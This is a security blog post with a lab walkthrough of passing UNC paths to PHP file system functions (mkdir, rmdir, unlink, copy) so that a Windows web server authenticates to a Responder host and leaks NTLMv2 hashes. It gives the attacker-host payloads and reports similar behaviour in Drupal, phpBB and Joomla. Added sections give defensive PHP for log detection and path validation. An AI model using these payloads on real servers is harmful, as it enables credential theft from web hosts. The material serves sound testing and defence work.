2020-03-08

Abusing File System functions in web applications - steal NTLMv2 hash

In this blog post, we explore the scenario in which a web application allows a user to perform file system operations on files and directories. An attacker can supply a UNC path as input to the vulnerable application, and the web server will then make a request to an attacker-controlled server. During that communication, the attacker-controlled server tricks the web server into leaking the NTLMv2 hash.
   

Pic credit goes to Ashwath Sir

Description:
Programming languages provide a range of functions that let a user perform file system operations, with a specific function for each piece of functionality.
Let's consider the case of PHP (here is the full reference to the file system functions available in PHP).

File related operations



Directory related operations


File system functions allow a user to operate not only on local files and directories but also on a remote file system (for example, an SMB server).
To access a remote SMB server, the file system function takes a UNC path as input and parses it (on a Windows-based machine).

Environment Set-up: -
My demo environment had the following configured in order to exploit the issue:

    Windows Server 2012 box     (IP - 192.168.56.2)
    Windows 7 AD Client box     (IP - 192.168.56.101)
    Backbox Linux box           (IP - 192.168.56.106)


Windows Server 2012 box: -
This is the Active Directory Domain Controller.

Windows 7 AD Client box: -
This machine runs Windows 7 and is joined to the Windows Active Directory domain. The web application is hosted on this machine, and the web server runs with the privileges of one of the Active Directory domain users (user box).

Backbox Linux box: -
This is the attacker machine, on which the "Responder" tool listens on port 445 for File Server Service (SMB) requests.


Exploitation scenario:
Let's suppose the vulnerable web application server satisfies the following conditions, which are required for exploitation:
1.    SMB outbound traffic firewall rule: outgoing traffic on SMB port 445 must be allowed from the Windows machine on which the web application is hosted.
2.    When user-supplied data is passed to a file system function, no other string is prepended to it.

To exploit the issue, the attacker needs to set up the "Responder" tool on a remote server.
The Windows machine can then make an SMB request to the attacker-controlled server, and Responder will ask the Windows machine to perform challenge-response based authentication.
In this process, Responder captures the NTLMv2 hash from the client Windows machine.
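From the web server's side, an attempt like the one described above shows up as a request parameter shaped like a UNC path or a remote stream wrapper. The following PHP script is an added example, not part of the original post: it scans access log lines for such parameters. The log lines, the script name fs.php and the client addresses are constructed for the demo; the `remote_path_kind()` and `scan_access_log()` functions are mine.

```php
<?php
// Added example (not from the blog): flag web server access log requests whose
// query parameters carry a UNC path or a remote stream wrapper. The log lines,
// script name and client addresses below are constructed for the demo.

declare(strict_types=1);

// Combined log format: client, timestamp, method, request target, status.
const LOG_LINE_RE = '#^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})#';

/**
 * Classify an already URL-decoded parameter value. Returns the kind of remote
 * reference it contains, or null when it looks like an ordinary local name.
 */
function remote_path_kind(string $value): ?string
{
    $v = ltrim($value);
    if (strncmp($v, '\\\\', 2) === 0 || strncmp($v, '//', 2) === 0) {
        return 'unc';                                  // \\host\share or //host/share
    }
    if (preg_match('#^(?:smb|cifs|file|ftp|https?|phar)://#i', $v) === 1) {
        return 'wrapper';                              // PHP stream wrapper / URL
    }
    return null;
}

/**
 * Walk access log lines and return one finding per suspicious parameter.
 */
function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (preg_match(LOG_LINE_RE, $line, $m) !== 1) {
            continue;                                  // not a request line we understand
        }
        [, $client, $time, $method, $target] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        parse_str($query, $params);                    // URL-decodes, e.g. %5C%5C -> \\
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;
            }
            $kind = remote_path_kind($value);
            if ($kind !== null) {
                $findings[] = [
                    'client' => $client, 'time' => $time, 'method' => $method,
                    'path'   => parse_url($target, PHP_URL_PATH),
                    'param'  => (string) $name, 'kind' => $kind, 'value' => $value,
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample lines: one benign mkdir, then the UNC, forward-slash UNC
// and smb:// wrapper variants against the same assumed fs.php script.
$sample = [
    '192.168.56.50 - - [08/Mar/2020:10:15:01 +0000] "GET /fs.php?action=mkdir&name=reports%2F2020 HTTP/1.1" 200 512',
    '192.168.56.50 - - [08/Mar/2020:10:15:09 +0000] "GET /fs.php?action=mkdir&name=%5C%5C192.168.56.106%5Cb0x HTTP/1.1" 500 301',
    '192.168.56.50 - - [08/Mar/2020:10:15:21 +0000] "GET /fs.php?action=unlink&name=//192.168.56.106/b0x.txt HTTP/1.1" 500 301',
    '192.168.56.77 - - [08/Mar/2020:10:16:02 +0000] "GET /fs.php?action=copy&src=smb%3A%2F%2F192.168.56.106%2Fb0x.txt&dst=local.txt HTTP/1.1" 500 301',
    '192.168.56.77 - - [08/Mar/2020:10:16:30 +0000] "GET /index.php HTTP/1.1" 200 1024',
];

foreach (scan_access_log($sample) as $f) {
    printf("%s %s %s %s param=%s kind=%s value=%s\n",
        $f['time'], $f['client'], $f['method'], $f['path'], $f['param'], $f['kind'], $f['value']);
}
```

Run with `php scan.php`; the three attack-shaped lines are reported and the two benign ones are not. Access logs only carry GET parameters, so the same classification belongs in the application (or a WAF) for POST bodies, and applications that legitimately accept URLs will need the `wrapper` rule tuned.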

Vulnerable code and web server environment:
The vulnerable web application code has an interface to perform various file system operations:



The vulnerable code is hosted on a machine running "Windows 7" with IP "192.168.56.101". This machine is part of the Windows Active Directory domain "lab.indishell.lab".


Exploiting directory operation related file system functions:
Let's start with the functions that operate on directories. The vulnerable code uses several of them.
Create Directory - mkdir(): the PHP function mkdir() expects 2 arguments:
   1. the name of the directory
   2. the permissions to set on the directory

In my case, Responder is listening on IP 192.168.56.106, which needs to be specified in the input box like this: "\\192.168.56.106\b0x". This input tells mkdir() to create a directory named "b0x" on the remote file share at IP 192.168.56.106 (where Responder is listening on SMB port 445).



The moment "Create directory" was clicked, mkdir() parsed the UNC path and tried to create the directory "b0x" on the machine where Responder was listening.
As always, Responder asked the Windows machine to complete challenge-response authentication, and the Windows machine handed the NTLMv2 hash to Responder.


Delete directory: rmdir()
The PHP rmdir() function expects 1 argument from the user: the path of the directory to delete.

In the input box, specify the UNC path to the machine where Responder is listening, like this: "\\192.168.56.106\b0x".
The specified path instructs rmdir() to delete the directory named "b0x" on the remote file system at IP 192.168.56.106.


Upon clicking the "Delete Directory" button, the rmdir() function tried to access the directory "b0x" located on IP 192.168.56.106 (the Responder machine).
Responder tricked the Windows machine into handing over the NTLMv2 hash.


List directory:
The PHP directory listing functions also process the UNC path, so Responder can capture the NTLMv2 hash from the web application server in the same way.



Exploiting file operation related file system functions:
The vulnerable code also has several file operation functions. Let's try them.
Delete File - unlink()
The PHP function unlink() deletes the specified file and expects 1 argument: the path to the file.

Responder is listening on IP 192.168.56.106, which needs to be specified in the input box like this: "\\192.168.56.106\b0x.txt". This input tells unlink() to delete the file named "b0x.txt" on the remote file share at IP 192.168.56.106 (where Responder is listening on SMB port 445).


The moment the "Delete File" button was clicked, the unlink() function tried to access the remote file system hosted on IP 192.168.56.106, and Responder captured the NTLMv2 hash.


Copy File - copy()
The PHP function copy() copies the file from the specified source to the specified destination.
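Every function in the two sections above (mkdir(), rmdir(), unlink(), copy() and the directory listing calls) fails the same way for the same reason: the user's string reaches the file system call unchanged, which is condition 2 of the exploitation scenario. The PHP below is an added example, not the blog's vulnerable code, showing the same operations behind a validator that refuses anything able to reach a remote host and forces the name to resolve under a fixed local directory. The storage root `BASE_DIR`, the function names and the sample inputs are my assumptions.

```php
<?php
// Added example, not the blog's vulnerable code: mkdir()/rmdir()/unlink()/copy()
// behind a validator that refuses any input able to reach a remote host. The
// storage root and the sample inputs are assumptions made for this demo.

declare(strict_types=1);

// Assumed application storage root; every user-controlled name must resolve under it.
const BASE_DIR = __DIR__ . DIRECTORY_SEPARATOR . 'userfiles';

/**
 * Turn a user-supplied name into an absolute path under BASE_DIR, or throw.
 * Rejected: UNC paths (\\host\share or //host/share, which Windows resolves
 * over SMB), absolute paths, stream wrappers and drive letters (smb://,
 * phar://, C:), NUL bytes, ".." segments and characters outside an allow-list.
 */
function safe_local_path(string $userInput): string
{
    if ($userInput === '' || strpos($userInput, "\0") !== false) {
        throw new InvalidArgumentException('empty path or NUL byte');
    }
    // Normalise separators so "\\host\share" and "//host/share" look the same.
    $normalized = str_replace('\\', '/', $userInput);
    if (strncmp($normalized, '//', 2) === 0) {
        throw new InvalidArgumentException('UNC path rejected');
    }
    if ($normalized[0] === '/') {
        throw new InvalidArgumentException('absolute path rejected');
    }
    if (preg_match('#^[A-Za-z][A-Za-z0-9+.-]*:#', $normalized) === 1) {
        throw new InvalidArgumentException('stream wrapper or drive letter rejected');
    }
    if (preg_match('#^[A-Za-z0-9_./-]+$#', $normalized) !== 1) {
        throw new InvalidArgumentException('unexpected characters in path');
    }
    if (in_array('..', explode('/', $normalized), true)) {
        throw new InvalidArgumentException('parent directory segment rejected');
    }
    $base = realpath(BASE_DIR);
    if ($base === false) {
        throw new RuntimeException('BASE_DIR does not exist');
    }
    $candidate = $base . DIRECTORY_SEPARATOR
        . str_replace('/', DIRECTORY_SEPARATOR, $normalized);
    // Containment check on the (existing) parent; also defeats symlinks pointing out of BASE_DIR.
    $parent = realpath(dirname($candidate));
    if ($parent === false
        || ($parent !== $base
            && strncmp($parent, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0)) {
        throw new InvalidArgumentException('path escapes BASE_DIR');
    }
    return $candidate;
}

// Hardened counterparts of the operations exposed by the vulnerable interface.
function create_directory(string $name): bool { return mkdir(safe_local_path($name), 0750); }
function delete_directory(string $name): bool { return rmdir(safe_local_path($name)); }
function delete_file(string $name): bool      { return unlink(safe_local_path($name)); }
function copy_file(string $src, string $dst): bool
{
    return copy(safe_local_path($src), safe_local_path($dst));
}

// Demo with constructed inputs: the UNC path from the post, its forward-slash
// and wrapper variants, a traversal attempt, and one benign relative name.
if (!is_dir(BASE_DIR . '/reports')) {
    mkdir(BASE_DIR . '/reports', 0750, true);
}
$inputs = [
    '\\\\192.168.56.106\\b0x',      // the literal string \\192.168.56.106\b0x
    '//192.168.56.106/b0x',
    'smb://192.168.56.106/b0x',
    '../b0x',
    'reports/b0x',
];
foreach ($inputs as $input) {
    try {
        printf("accepted: %-28s -> %s\n", $input, safe_local_path($input));
    } catch (InvalidArgumentException $e) {
        printf("rejected: %-28s (%s)\n", $input, $e->getMessage());
    }
}
```

Only "reports/b0x" is accepted; the four other inputs are rejected before any file system call is made. Note that setting allow_url_fopen=Off does not help here: a UNC path is resolved by the Windows file API underneath PHP, not by a PHP URL wrapper, so input validation at the application boundary plus blocking outbound SMB (condition 1 above) are the controls that matter.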




Real life scenario - Drupal (tested on version 7.6.6)
The Drupal CMS admin panel has functionality to specify the path to temporary files via the "Temporary Directory" input field.

In Drupal CMS below version 8.2.2, under "Configuration -> File System", there is an option to specify the path to temporary files. The user can specify a remote file system path as well, using a UNC path like this: "\\remote_file_system_IP\directory_name":


In this case, I specified the UNC path to my attacker machine, on which Responder is listening on SMB port 445.

Drupal CMS tried to access the remote file system and Responder grabbed the NTLMv2 hash from the web application user.


The Drupal CMS interface error message shows that the script tried to create the directory on the remote file system at IP 192.168.1.105 using the mkdir() function.


The same behaviour was observed in phpBB (up to version 3.2.3) and Joomla CMS (latest version).
  
Thanks for reading :)

Special thanks to Sean Metcalf, OJ, hacker fantastic, A K Reddy, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan


--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba
#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad
#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA
#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir
#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)



 

© 2009 Start With Linux | Mannu Linux